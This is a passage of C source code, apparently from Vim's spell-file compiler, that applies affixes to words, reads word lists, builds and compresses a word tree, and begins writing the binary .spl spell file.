hi = hash_find(&affile->af_comp, key);
if (!HASHITEM_EMPTY(hi))
store_afflist[cnt++] = HI2CI(hi)->ci_newID;
}
if (affile->af_flagtype == AFT_NUM && *p == ',')
++p;
}
store_afflist[cnt] = NUL;
}
/*
* Apply affixes to a word and store the resulting words.
* "ht" is the hashtable with affentry_T that need to be applied, either
* prefixes or suffixes.
* "xht", when not NULL, is the prefix hashtable, to be used additionally on
* the resulting words for combining affixes.
*
* Returns FAIL when out of memory.
*/
static int
store_aff_word(
spellinfo_T *spin, /* spell info */
char_u *word, /* basic word start */
char_u *afflist, /* list of names of supported affixes */
afffile_T *affile,
hashtab_T *ht,
hashtab_T *xht,
int condit, /* CONDIT_SUF et al. */
int flags, /* flags for the word */
char_u *pfxlist, /* list of prefix IDs */
int pfxlen) /* nr of flags in "pfxlist" for prefixes, rest
* is compound flags */
{
int todo;
hashitem_T *hi;
affheader_T *ah;
affentry_T *ae;
char_u newword[MAXWLEN];
int retval = OK;
int i, j;
char_u *p;
int use_flags;
char_u *use_pfxlist;
int use_pfxlen;
int need_affix;
char_u store_afflist[MAXWLEN];
char_u pfx_pfxlist[MAXWLEN];
size_t wordlen = STRLEN(word);
int use_condit;
todo = (int)ht->ht_used;
for (hi = ht->ht_array; todo > 0 && retval == OK; ++hi)
{
if (!HASHITEM_EMPTY(hi))
{
--todo;
ah = HI2AH(hi);
/* Check that the affix combines, if required, and that the word
* supports this affix. */
if (((condit & CONDIT_COMB) == 0 || ah->ah_combine)
&& flag_in_afflist(affile->af_flagtype, afflist,
ah->ah_flag))
{
/* Loop over all affix entries with this name. */
for (ae = ah->ah_first; ae != NULL; ae = ae->ae_next)
{
/* Check the condition. It's not logical to match case
* here, but it is required for compatibility with
* Myspell.
* Another requirement from Myspell is that the chop
* string is shorter than the word itself.
* For prefixes, when "PFXPOSTPONE" was used, only do
* prefixes with a chop string and/or flags.
* When a previously added affix had CIRCUMFIX this one
* must have it too, if it had not then this one must not
* have one either. */
if ((xht != NULL || !affile->af_pfxpostpone
|| ae->ae_chop != NULL
|| ae->ae_flags != NULL)
&& (ae->ae_chop == NULL
|| STRLEN(ae->ae_chop) < wordlen)
&& (ae->ae_prog == NULL
|| vim_regexec_prog(&ae->ae_prog, FALSE,
word, (colnr_T)0))
&& (((condit & CONDIT_CFIX) == 0)
== ((condit & CONDIT_AFF) == 0
|| ae->ae_flags == NULL
|| !flag_in_afflist(affile->af_flagtype,
ae->ae_flags, affile->af_circumfix))))
{
/* Match. Remove the chop and add the affix. */
if (xht == NULL)
{
/* prefix: chop/add at the start of the word */
if (ae->ae_add == NULL)
*newword = NUL;
else
vim_strncpy(newword, ae->ae_add, MAXWLEN - 1);
p = word;
if (ae->ae_chop != NULL)
{
/* Skip chop string. */
#ifdef FEAT_MBYTE
if (has_mbyte)
{
i = mb_charlen(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_adv(p);
}
else
#endif
p += STRLEN(ae->ae_chop);
}
STRCAT(newword, p);
}
else
{
/* suffix: chop/add at the end of the word */
vim_strncpy(newword, word, MAXWLEN - 1);
if (ae->ae_chop != NULL)
{
/* Remove chop string. */
p = newword + STRLEN(newword);
i = (int)MB_CHARLEN(ae->ae_chop);
for ( ; i > 0; --i)
mb_ptr_back(newword, p);
*p = NUL;
}
if (ae->ae_add != NULL)
STRCAT(newword, ae->ae_add);
}
use_flags = flags;
use_pfxlist = pfxlist;
use_pfxlen = pfxlen;
need_affix = FALSE;
use_condit = condit | CONDIT_COMB | CONDIT_AFF;
if (ae->ae_flags != NULL)
{
/* Extract flags from the affix list. */
use_flags |= get_affix_flags(affile, ae->ae_flags);
if (affile->af_needaffix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_needaffix))
need_affix = TRUE;
/* When there is a CIRCUMFIX flag the other affix
* must also have it and we don't add the word
* with one affix. */
if (affile->af_circumfix != 0 && flag_in_afflist(
affile->af_flagtype, ae->ae_flags,
affile->af_circumfix))
{
use_condit |= CONDIT_CFIX;
if ((condit & CONDIT_CFIX) == 0)
need_affix = TRUE;
}
if (affile->af_pfxpostpone
|| spin->si_compflags != NULL)
{
if (affile->af_pfxpostpone)
/* Get prefix IDS from the affix list. */
use_pfxlen = get_pfxlist(affile,
ae->ae_flags, store_afflist);
else
use_pfxlen = 0;
use_pfxlist = store_afflist;
/* Combine the prefix IDs. Avoid adding the
* same ID twice. */
for (i = 0; i < pfxlen; ++i)
{
for (j = 0; j < use_pfxlen; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (j == use_pfxlen)
use_pfxlist[use_pfxlen++] = pfxlist[i];
}
if (spin->si_compflags != NULL)
/* Get compound IDS from the affix list. */
get_compflags(affile, ae->ae_flags,
use_pfxlist + use_pfxlen);
/* Combine the list of compound flags.
* Concatenate them to the prefix IDs list.
* Avoid adding the same ID twice. */
for (i = pfxlen; pfxlist[i] != NUL; ++i)
{
for (j = use_pfxlen;
use_pfxlist[j] != NUL; ++j)
if (pfxlist[i] == use_pfxlist[j])
break;
if (use_pfxlist[j] == NUL)
{
use_pfxlist[j++] = pfxlist[i];
use_pfxlist[j] = NUL;
}
}
}
}
/* Obey a "COMPOUNDFORBIDFLAG" of the affix: don't
* use the compound flags. */
if (use_pfxlist != NULL && ae->ae_compforbid)
{
vim_strncpy(pfx_pfxlist, use_pfxlist, use_pfxlen);
use_pfxlist = pfx_pfxlist;
}
/* When there are postponed prefixes... */
if (spin->si_prefroot != NULL
&& spin->si_prefroot->wn_sibling != NULL)
{
/* ... add a flag to indicate an affix was used. */
use_flags |= WF_HAS_AFF;
/* ... don't use a prefix list if combining
* affixes is not allowed. But do use the
* compound flags after them. */
if (!ah->ah_combine && use_pfxlist != NULL)
use_pfxlist += use_pfxlen;
}
/* When compounding is supported and there is no
* "COMPOUNDPERMITFLAG" then forbid compounding on the
* side where the affix is applied. */
if (spin->si_compflags != NULL && !ae->ae_comppermit)
{
if (xht != NULL)
use_flags |= WF_NOCOMPAFT;
else
use_flags |= WF_NOCOMPBEF;
}
/* Store the modified word. */
if (store_word(spin, newword, use_flags,
spin->si_region, use_pfxlist,
need_affix) == FAIL)
retval = FAIL;
/* When added a prefix or a first suffix and the affix
* has flags may add a(nother) suffix. RECURSIVE! */
if ((condit & CONDIT_SUF) && ae->ae_flags != NULL)
if (store_aff_word(spin, newword, ae->ae_flags,
affile, &affile->af_suff, xht,
use_condit & (xht == NULL
? ~0 : ~CONDIT_SUF),
use_flags, use_pfxlist, pfxlen) == FAIL)
retval = FAIL;
/* When added a suffix and combining is allowed also
* try adding a prefix additionally. Both for the
* word flags and for the affix flags. RECURSIVE! */
if (xht != NULL && ah->ah_combine)
{
if (store_aff_word(spin, newword,
afflist, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL
|| (ae->ae_flags != NULL
&& store_aff_word(spin, newword,
ae->ae_flags, affile,
xht, NULL, use_condit,
use_flags, use_pfxlist,
pfxlen) == FAIL))
retval = FAIL;
}
}
}
}
}
}
return retval;
}
/*
* Read a file with a list of words.
*/
static int
spell_read_wordfile(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
long lnum = 0;
char_u rline[MAXLINELEN];
char_u *line;
char_u *pc = NULL;
char_u *p;
int l;
int retval = OK;
int did_word = FALSE;
int non_ascii = 0;
int flags;
int regionmask;
/*
* Open the file.
*/
fd = mch_fopen((char *)fname, "r");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
vim_snprintf((char *)IObuff, IOSIZE, _("Reading word file %s ..."), fname);
spell_message(spin, IObuff);
/*
* Read all the lines in the file one by one.
*/
while (!vim_fgets(rline, MAXLINELEN, fd) && !got_int)
{
line_breakcheck();
++lnum;
/* Skip comment lines. */
if (*rline == '#')
continue;
/* Remove CR, LF and white space from the end. */
l = (int)STRLEN(rline);
while (l > 0 && rline[l - 1] <= ' ')
--l;
if (l == 0)
continue; /* empty or blank line */
rline[l] = NUL;
/* Convert from "/encoding={encoding}" to 'encoding' when needed. */
vim_free(pc);
#ifdef FEAT_MBYTE
if (spin->si_conv.vc_type != CONV_NONE)
{
pc = string_convert(&spin->si_conv, rline, NULL);
if (pc == NULL)
{
smsg((char_u *)_("Conversion failure for word in %s line %d: %s"),
fname, lnum, rline);
continue;
}
line = pc;
}
else
#endif
{
pc = NULL;
line = rline;
}
if (*line == '/')
{
++line;
if (STRNCMP(line, "encoding=", 9) == 0)
{
if (spin->si_conv.vc_type != CONV_NONE)
smsg((char_u *)_("Duplicate /encoding= line ignored in %s line %d: %s"),
fname, lnum, line - 1);
else if (did_word)
smsg((char_u *)_("/encoding= line after word ignored in %s line %d: %s"),
fname, lnum, line - 1);
else
{
#ifdef FEAT_MBYTE
char_u *enc;
/* Setup for conversion to 'encoding'. */
line += 9;
enc = enc_canonize(line);
if (enc != NULL && !spin->si_ascii
&& convert_setup(&spin->si_conv, enc,
p_enc) == FAIL)
smsg((char_u *)_("Conversion in %s not supported: from %s to %s"),
fname, line, p_enc);
vim_free(enc);
spin->si_conv.vc_fail = TRUE;
#else
smsg((char_u *)_("Conversion in %s not supported"), fname);
#endif
}
continue;
}
if (STRNCMP(line, "regions=", 8) == 0)
{
if (spin->si_region_count > 1)
smsg((char_u *)_("Duplicate /regions= line ignored in %s line %d: %s"),
fname, lnum, line);
else
{
line += 8;
if (STRLEN(line) > 16)
smsg((char_u *)_("Too many regions in %s line %d: %s"),
fname, lnum, line);
else
{
spin->si_region_count = (int)STRLEN(line) / 2;
STRCPY(spin->si_region_name, line);
/* Adjust the mask for a word valid in all regions. */
spin->si_region = (1 << spin->si_region_count) - 1;
}
}
continue;
}
smsg((char_u *)_("/ line ignored in %s line %d: %s"),
fname, lnum, line - 1);
continue;
}
flags = 0;
regionmask = spin->si_region;
/* Check for flags and region after a slash. */
p = vim_strchr(line, '/');
if (p != NULL)
{
*p++ = NUL;
while (*p != NUL)
{
if (*p == '=') /* keep-case word */
flags |= WF_KEEPCAP | WF_FIXCAP;
else if (*p == '!') /* Bad, bad, wicked word. */
flags |= WF_BANNED;
else if (*p == '?') /* Rare word. */
flags |= WF_RARE;
else if (VIM_ISDIGIT(*p)) /* region number(s) */
{
if ((flags & WF_REGION) == 0) /* first one */
regionmask = 0;
flags |= WF_REGION;
l = *p - '0';
if (l > spin->si_region_count)
{
smsg((char_u *)_("Invalid region nr in %s line %d: %s"),
fname, lnum, p);
break;
}
regionmask |= 1 << (l - 1);
}
else
{
smsg((char_u *)_("Unrecognized flags in %s line %d: %s"),
fname, lnum, p);
break;
}
++p;
}
}
/* Skip non-ASCII words when "spin->si_ascii" is TRUE. */
if (spin->si_ascii && has_non_ascii(line))
{
++non_ascii;
continue;
}
/* Normal word: store it. */
if (store_word(spin, line, flags, regionmask, NULL, FALSE) == FAIL)
{
retval = FAIL;
break;
}
did_word = TRUE;
}
vim_free(pc);
fclose(fd);
if (spin->si_ascii && non_ascii > 0)
{
vim_snprintf((char *)IObuff, IOSIZE,
_("Ignored %d words with non-ASCII characters"), non_ascii);
spell_message(spin, IObuff);
}
return retval;
}
/*
* Get part of an sblock_T, "len" bytes long.
* This avoids calling free() for every little struct we use (and keeping
* track of them).
* The memory is cleared to all zeros.
* Returns NULL when out of memory.
*/
static void *
getroom(
spellinfo_T *spin,
size_t len, /* length needed */
int align) /* align for pointer */
{
char_u *p;
sblock_T *bl = spin->si_blocks;
if (align && bl != NULL)
/* Round size up for alignment. On some systems structures need to be
* aligned to the size of a pointer (e.g., SPARC). */
bl->sb_used = (bl->sb_used + sizeof(char *) - 1)
& ~(sizeof(char *) - 1);
if (bl == NULL || bl->sb_used + len > SBLOCKSIZE)
{
if (len >= SBLOCKSIZE)
bl = NULL;
else
/* Allocate a block of memory. It is not freed until much later. */
bl = (sblock_T *)alloc_clear(
(unsigned)(sizeof(sblock_T) + SBLOCKSIZE));
if (bl == NULL)
{
if (!spin->si_did_emsg)
{
EMSG(_("E845: Insufficient memory, word list will be incomplete"));
spin->si_did_emsg = TRUE;
}
return NULL;
}
bl->sb_next = spin->si_blocks;
spin->si_blocks = bl;
bl->sb_used = 0;
++spin->si_blocks_cnt;
}
p = bl->sb_data + bl->sb_used;
bl->sb_used += (int)len;
return p;
}
/*
* Make a copy of a string into memory allocated with getroom().
* Returns NULL when out of memory.
*/
static char_u *
getroom_save(spellinfo_T *spin, char_u *s)
{
char_u *sc;
sc = (char_u *)getroom(spin, STRLEN(s) + 1, FALSE);
if (sc != NULL)
STRCPY(sc, s);
return sc;
}
/*
* Free the list of allocated sblock_T.
*/
static void
free_blocks(sblock_T *bl)
{
sblock_T *next;
while (bl != NULL)
{
next = bl->sb_next;
vim_free(bl);
bl = next;
}
}
/*
* Allocate the root of a word tree.
* Returns NULL when out of memory.
*/
static wordnode_T *
wordtree_alloc(spellinfo_T *spin)
{
return (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
}
/*
* Store a word in the tree(s).
* Always store it in the case-folded tree. For a keep-case word this is
* useful when the word can also be used with all caps (no WF_FIXCAP flag) and
* used to find suggestions.
* For a keep-case word also store it in the keep-case tree.
* When "pfxlist" is not NULL store the word for each postponed prefix ID and
* compound flag.
*/
static int
store_word(
spellinfo_T *spin,
char_u *word,
int flags, /* extra flags, WF_BANNED */
int region, /* supported region(s) */
char_u *pfxlist, /* list of prefix IDs or NULL */
int need_affix) /* only store word with affix ID */
{
int len = (int)STRLEN(word);
int ct = captype(word, word + len);
char_u foldword[MAXWLEN];
int res = OK;
char_u *p;
(void)spell_casefold(word, len, foldword, MAXWLEN);
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, foldword, spin->si_foldroot, ct | flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_foldwcount;
if (res == OK && (ct == WF_KEEPCAP || (flags & WF_KEEPCAP)))
{
for (p = pfxlist; res == OK; ++p)
{
if (!need_affix || (p != NULL && *p != NUL))
res = tree_add_word(spin, word, spin->si_keeproot, flags,
region, p == NULL ? 0 : *p);
if (p == NULL || *p == NUL)
break;
}
++spin->si_keepwcount;
}
return res;
}
/*
* Add word "word" to a word tree at "root".
* When "flags" < 0 we are adding to the prefix tree where "flags" is used for
* "rare" and "region" is the condition nr.
* Returns FAIL when out of memory.
*/
static int
tree_add_word(
spellinfo_T *spin,
char_u *word,
wordnode_T *root,
int flags,
int region,
int affixID)
{
wordnode_T *node = root;
wordnode_T *np;
wordnode_T *copyp, **copyprev;
wordnode_T **prev = NULL;
int i;
/* Add each byte of the word to the tree, including the NUL at the end. */
for (i = 0; ; ++i)
{
/* When there is more than one reference to this node we need to make
* a copy, so that we can modify it. Copy the whole list of siblings
* (we don't optimize for a partly shared list of siblings). */
if (node != NULL && node->wn_refs > 1)
{
--node->wn_refs;
copyprev = prev;
for (copyp = node; copyp != NULL; copyp = copyp->wn_sibling)
{
/* Allocate a new node and copy the info. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_child = copyp->wn_child;
if (np->wn_child != NULL)
++np->wn_child->wn_refs; /* child gets extra ref */
np->wn_byte = copyp->wn_byte;
if (np->wn_byte == NUL)
{
np->wn_flags = copyp->wn_flags;
np->wn_region = copyp->wn_region;
np->wn_affixID = copyp->wn_affixID;
}
/* Link the new node in the list, there will be one ref. */
np->wn_refs = 1;
if (copyprev != NULL)
*copyprev = np;
copyprev = &np->wn_sibling;
/* Let "node" point to the head of the copied list. */
if (copyp == node)
node = np;
}
}
/* Look for the sibling that has the same character. They are sorted
* on byte value, thus stop searching when a sibling is found with a
* higher byte value. For zero bytes (end of word) the sorting is
* done on flags and then on affixID. */
while (node != NULL
&& (node->wn_byte < word[i]
|| (node->wn_byte == NUL
&& (flags < 0
? node->wn_affixID < (unsigned)affixID
: (node->wn_flags < (unsigned)(flags & WN_MASK)
|| (node->wn_flags == (flags & WN_MASK)
&& (spin->si_sugtree
? (node->wn_region & 0xffff) < region
: node->wn_affixID
< (unsigned)affixID)))))))
{
prev = &node->wn_sibling;
node = *prev;
}
if (node == NULL
|| node->wn_byte != word[i]
|| (word[i] == NUL
&& (flags < 0
|| spin->si_sugtree
|| node->wn_flags != (flags & WN_MASK)
|| node->wn_affixID != affixID)))
{
/* Allocate a new node. */
np = get_wordnode(spin);
if (np == NULL)
return FAIL;
np->wn_byte = word[i];
/* If "node" is NULL this is a new child or the end of the sibling
* list: ref count is one. Otherwise use ref count of sibling and
* make ref count of sibling one (matters when inserting in front
* of the list of siblings). */
if (node == NULL)
np->wn_refs = 1;
else
{
np->wn_refs = node->wn_refs;
node->wn_refs = 1;
}
if (prev != NULL)
*prev = np;
np->wn_sibling = node;
node = np;
}
if (word[i] == NUL)
{
node->wn_flags = flags;
node->wn_region |= region;
node->wn_affixID = affixID;
break;
}
prev = &node->wn_child;
node = *prev;
}
#ifdef SPELL_PRINTTREE
smsg((char_u *)"Added \"%s\"", word);
spell_print_tree(root->wn_sibling);
#endif
/* count nr of words added since last message */
++spin->si_msg_count;
if (spin->si_compress_cnt > 1)
{
if (--spin->si_compress_cnt == 1)
/* Did enough words to lower the block count limit. */
spin->si_blocks_cnt += compress_inc;
}
/*
* When we have allocated lots of memory we need to compress the word tree
* to free up some room. But compression is slow, and we might actually
* need that room, thus only compress in the following situations:
* 1. When not compressed before (si_compress_cnt == 0): when using
* "compress_start" blocks.
* 2. When compressed before and used "compress_inc" blocks before
* adding "compress_added" words (si_compress_cnt > 1).
* 3. When compressed before, added "compress_added" words
* (si_compress_cnt == 1) and the number of free nodes drops below the
* maximum word length.
*/
#ifndef SPELL_COMPRESS_ALLWAYS
if (spin->si_compress_cnt == 1
? spin->si_free_count < MAXWLEN
: spin->si_blocks_cnt >= compress_start)
#endif
{
/* Decrement the block counter. The effect is that we compress again
* when the freed up room has been used and another "compress_inc"
* blocks have been allocated. Unless "compress_added" words have
* been added, then the limit is put back again. */
spin->si_blocks_cnt -= compress_inc;
spin->si_compress_cnt = compress_added;
if (spin->si_verbose)
{
msg_start();
msg_puts((char_u *)_(msg_compressing));
msg_clr_eos();
msg_didout = FALSE;
msg_col = 0;
out_flush();
}
/* Compress both trees. Either they both have many nodes, which makes
* compression useful, or one of them is small, which means
* compression goes fast. But when filling the soundfold word tree
* there is no keep-case tree. */
wordtree_compress(spin, spin->si_foldroot);
if (affixID >= 0)
wordtree_compress(spin, spin->si_keeproot);
}
return OK;
}
/*
* Get a wordnode_T, either from the list of previously freed nodes or
* allocate a new one.
* Returns NULL when out of memory.
*/
static wordnode_T *
get_wordnode(spellinfo_T *spin)
{
wordnode_T *n;
if (spin->si_first_free == NULL)
n = (wordnode_T *)getroom(spin, sizeof(wordnode_T), TRUE);
else
{
n = spin->si_first_free;
spin->si_first_free = n->wn_child;
vim_memset(n, 0, sizeof(wordnode_T));
--spin->si_free_count;
}
#ifdef SPELL_PRINTTREE
if (n != NULL)
n->wn_nr = ++spin->si_wordnode_nr;
#endif
return n;
}
/*
* Decrement the reference count on a node (which is the head of a list of
* siblings). If the reference count becomes zero free the node and its
* siblings.
* Returns the number of nodes actually freed.
*/
static int
deref_wordnode(spellinfo_T *spin, wordnode_T *node)
{
wordnode_T *np;
int cnt = 0;
if (--node->wn_refs == 0)
{
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_child != NULL)
cnt += deref_wordnode(spin, np->wn_child);
free_wordnode(spin, np);
++cnt;
}
++cnt; /* length field */
}
return cnt;
}
/*
* Free a wordnode_T for re-use later.
* Only the "wn_child" field becomes invalid.
*/
static void
free_wordnode(spellinfo_T *spin, wordnode_T *n)
{
n->wn_child = spin->si_first_free;
spin->si_first_free = n;
++spin->si_free_count;
}
/*
* Compress a tree: find tails that are identical and can be shared.
*/
static void
wordtree_compress(spellinfo_T *spin, wordnode_T *root)
{
hashtab_T ht;
int n;
int tot = 0;
int perc;
/* Skip the root itself, it's not actually used. The first sibling is the
* start of the tree. */
if (root->wn_sibling != NULL)
{
hash_init(&ht);
n = node_compress(spin, root->wn_sibling, &ht, &tot);
#ifndef SPELL_PRINTTREE
if (spin->si_verbose || p_verbose > 2)
#endif
{
if (tot > 1000000)
perc = (tot - n) / (tot / 100);
else if (tot == 0)
perc = 0;
else
perc = (tot - n) * 100 / tot;
vim_snprintf((char *)IObuff, IOSIZE,
_("Compressed %d of %d nodes; %d (%d%%) remaining"),
n, tot, tot - n, perc);
spell_message(spin, IObuff);
}
#ifdef SPELL_PRINTTREE
spell_print_tree(root->wn_sibling);
#endif
hash_clear(&ht);
}
}
/*
* Compress a node, its siblings and its children, depth first.
* Returns the number of compressed nodes.
*/
static int
node_compress(
spellinfo_T *spin,
wordnode_T *node,
hashtab_T *ht,
int *tot) /* total count of nodes before compressing,
incremented while going through the tree */
{
wordnode_T *np;
wordnode_T *tp;
wordnode_T *child;
hash_T hash;
hashitem_T *hi;
int len = 0;
unsigned nr, n;
int compressed = 0;
/*
* Go through the list of siblings. Compress each child and then try
* finding an identical child to replace it.
* Note that with "child" we mean not just the node that is pointed to,
* but the whole list of siblings of which the child node is the first.
*/
for (np = node; np != NULL && !got_int; np = np->wn_sibling)
{
++len;
if ((child = np->wn_child) != NULL)
{
/* Compress the child first. This fills hashkey. */
compressed += node_compress(spin, child, ht, tot);
/* Try to find an identical child. */
hash = hash_hash(child->wn_u1.hashkey);
hi = hash_lookup(ht, child->wn_u1.hashkey, hash);
if (!HASHITEM_EMPTY(hi))
{
/* There are children we encountered before with a hash value
* identical to the current child. Now check if there is one
* that is really identical. */
for (tp = HI2WN(hi); tp != NULL; tp = tp->wn_u2.next)
if (node_equal(child, tp))
{
/* Found one! Now use that child in place of the
* current one. This means the current child and all
* its siblings is unlinked from the tree. */
++tp->wn_refs;
compressed += deref_wordnode(spin, child);
np->wn_child = tp;
break;
}
if (tp == NULL)
{
/* No other child with this hash value equals the child of
* the node, add it to the linked list after the first
* item. */
tp = HI2WN(hi);
child->wn_u2.next = tp->wn_u2.next;
tp->wn_u2.next = child;
}
}
else
/* No other child has this hash value, add it to the
* hashtable. */
hash_add_item(ht, hi, child->wn_u1.hashkey, hash);
}
}
*tot += len + 1; /* add one for the node that stores the length */
/*
* Make a hash key for the node and its siblings, so that we can quickly
* find a lookalike node. This must be done after compressing the sibling
* list, otherwise the hash key would become invalid by the compression.
*/
node->wn_u1.hashkey[0] = len;
nr = 0;
for (np = node; np != NULL; np = np->wn_sibling)
{
if (np->wn_byte == NUL)
/* end node: use wn_flags, wn_region and wn_affixID */
n = np->wn_flags + (np->wn_region << 8) + (np->wn_affixID << 16);
else
/* byte node: use the byte value and the child pointer */
n = (unsigned)(np->wn_byte + ((long_u)np->wn_child << 8));
nr = nr * 101 + n;
}
/* Avoid NUL bytes, it terminates the hash key. */
n = nr & 0xff;
node->wn_u1.hashkey[1] = n == 0 ? 1 : n;
n = (nr >> 8) & 0xff;
node->wn_u1.hashkey[2] = n == 0 ? 1 : n;
n = (nr >> 16) & 0xff;
node->wn_u1.hashkey[3] = n == 0 ? 1 : n;
n = (nr >> 24) & 0xff;
node->wn_u1.hashkey[4] = n == 0 ? 1 : n;
node->wn_u1.hashkey[5] = NUL;
/* Check for CTRL-C pressed now and then. */
fast_breakcheck();
return compressed;
}
/*
* Return TRUE when two nodes have identical siblings and children.
*/
static int
node_equal(wordnode_T *n1, wordnode_T *n2)
{
wordnode_T *p1;
wordnode_T *p2;
for (p1 = n1, p2 = n2; p1 != NULL && p2 != NULL;
p1 = p1->wn_sibling, p2 = p2->wn_sibling)
if (p1->wn_byte != p2->wn_byte
|| (p1->wn_byte == NUL
? (p1->wn_flags != p2->wn_flags
|| p1->wn_region != p2->wn_region
|| p1->wn_affixID != p2->wn_affixID)
: (p1->wn_child != p2->wn_child)))
break;
return p1 == NULL && p2 == NULL;
}
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2);
/*
* Function given to qsort() to sort the REP items on "from" string.
*/
static int
#ifdef __BORLANDC__
_RTLENTRYF
#endif
rep_compare(const void *s1, const void *s2)
{
fromto_T *p1 = (fromto_T *)s1;
fromto_T *p2 = (fromto_T *)s2;
return STRCMP(p1->ft_from, p2->ft_from);
}
/*
* Write the Vim .spl file "fname".
* Return FAIL or OK;
*/
static int
write_vim_spell(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
int regionmask;
int round;
wordnode_T *tree;
int nodecount;
int i;
int l;
garray_T *gap;
fromto_T *ftp;
char_u *p;
int rr;
int retval = OK;
size_t fwv = 1; /* collect return value of fwrite() to avoid
warnings from picky compiler */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return FAIL;
}
/* <HEADER>: <fileID> <versionnr> */
/* <fileID> */
fwv &= fwrite(VIMSPELLMAGIC, VIMSPELLMAGICL, (size_t)1, fd);
if (fwv != (size_t)1)
/* Catch first write error, don't try writing more. */
goto theend;
putc(VIMSPELLVERSION, fd); /* <versionnr> */
/*
* <SECTIONS>: <section> ... <sectionend>
*/
/* SN_INFO: <infotext> */
if (spin->si_info != NULL)
{
putc(SN_INFO, fd); /* <sectionID> */
putc(0, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_info);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_info, (size_t)i, (size_t)1, fd); /* <infotext> */
}
/* SN_REGION: <regionname> ...
* Write the region names only if there is more than one. */
if (spin->si_region_count > 1)
{
putc(SN_REGION, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = spin->si_region_count * 2;
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_region_name, (size_t)l, (size_t)1, fd);
/* <regionname> ... */
regionmask = (1 << spin->si_region_count) - 1;
}
else
regionmask = 0;
/* SN_CHARFLAGS: <charflagslen> <charflags> <folcharslen> <folchars>
*
* The table with character flags and the table for case folding.
* This makes sure the same characters are recognized as word characters
* when generating an when using a spell file.
* Skip this for ASCII, the table may conflict with the one used for
* 'encoding'.
* Also skip this for an .add.spl file, the main spell file must contain
* the table (avoids that it conflicts). File is shorter too.
*/
if (!spin->si_ascii && !spin->si_add)
{
char_u folchars[128 * 8];
int flags;
putc(SN_CHARFLAGS, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
/* Form the <folchars> string first, we need to know its length. */
l = 0;
for (i = 128; i < 256; ++i)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
l += mb_char2bytes(spelltab.st_fold[i], folchars + l);
else
#endif
folchars[l++] = spelltab.st_fold[i];
}
put_bytes(fd, (long_u)(1 + 128 + 2 + l), 4); /* <sectionlen> */
fputc(128, fd); /* <charflagslen> */
for (i = 128; i < 256; ++i)
{
flags = 0;
if (spelltab.st_isw[i])
flags |= CF_WORD;
if (spelltab.st_isu[i])
flags |= CF_UPPER;
fputc(flags, fd); /* <charflags> */
}
put_bytes(fd, (long_u)l, 2); /* <folcharslen> */
fwv &= fwrite(folchars, (size_t)l, (size_t)1, fd); /* <folchars> */
}
/* SN_MIDWORD: <midword> */
if (spin->si_midword != NULL)
{
putc(SN_MIDWORD, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
i = (int)STRLEN(spin->si_midword);
put_bytes(fd, (long_u)i, 4); /* <sectionlen> */
fwv &= fwrite(spin->si_midword, (size_t)i, (size_t)1, fd);
/* <midword> */
}
/* SN_PREFCOND: <prefcondcnt> <prefcond> ... */
if (spin->si_prefcond.ga_len > 0)
{
putc(SN_PREFCOND, fd); /* <sectionID> */
putc(SNF_REQUIRED, fd); /* <sectionflags> */
l = write_spell_prefcond(NULL, &spin->si_prefcond);
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
write_spell_prefcond(fd, &spin->si_prefcond);
}
/* SN_REP: <repcount> <rep> ...
* SN_SAL: <salflags> <salcount> <sal> ...
* SN_REPSAL: <repcount> <rep> ... */
/* round 1: SN_REP section
* round 2: SN_SAL section (unless SN_SOFO is used)
* round 3: SN_REPSAL section */
for (round = 1; round <= 3; ++round)
{
if (round == 1)
gap = &spin->si_rep;
else if (round == 2)
{
/* Don't write SN_SAL when using a SN_SOFO section */
if (spin->si_sofofr != NULL && spin->si_sofoto != NULL)
continue;
gap = &spin->si_sal;
}
else
gap = &spin->si_repsal;
/* Don't write the section if there are no items. */
if (gap->ga_len == 0)
continue;
/* Sort the REP/REPSAL items. */
if (round != 2)
qsort(gap->ga_data, (size_t)gap->ga_len,
sizeof(fromto_T), rep_compare);
i = round == 1 ? SN_REP : (round == 2 ? SN_SAL : SN_REPSAL);
putc(i, fd); /* <sectionID> */
/* This is for making suggestions, section is not required. */
putc(0, fd); /* <sectionflags> */
/* Compute the length of what follows. */
l = 2; /* count <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
ftp = &((fromto_T *)gap->ga_data)[i];
l += 1 + (int)STRLEN(ftp->ft_from); /* count <*fromlen> and <*from> */
l += 1 + (int)STRLEN(ftp->ft_to); /* count <*tolen> and <*to> */
}
if (round == 2)
++l; /* count <salflags> */
put_bytes(fd, (long_u)l, 4); /* <sectionlen> */
if (round == 2)
{
i = 0;
if (spin->si_followup)
i |= SAL_F0LLOWUP;
if (spin->si_collapse)
i |= SAL_COLLAPSE;
if (spin->si_rem_accents)
i |= SAL_REM_ACCENTS;
putc(i, fd); /* <salflags> */
}
put_bytes(fd, (long_u)gap->ga_len, 2); /* <repcount> or <salcount> */
for (i = 0; i < gap->ga_len; ++i)
{
/* <rep> : <repfromlen> <repfrom> <reptolen> <repto> */
/* <sal> : <salfromlen> <salfrom> <saltolen> <salto> */
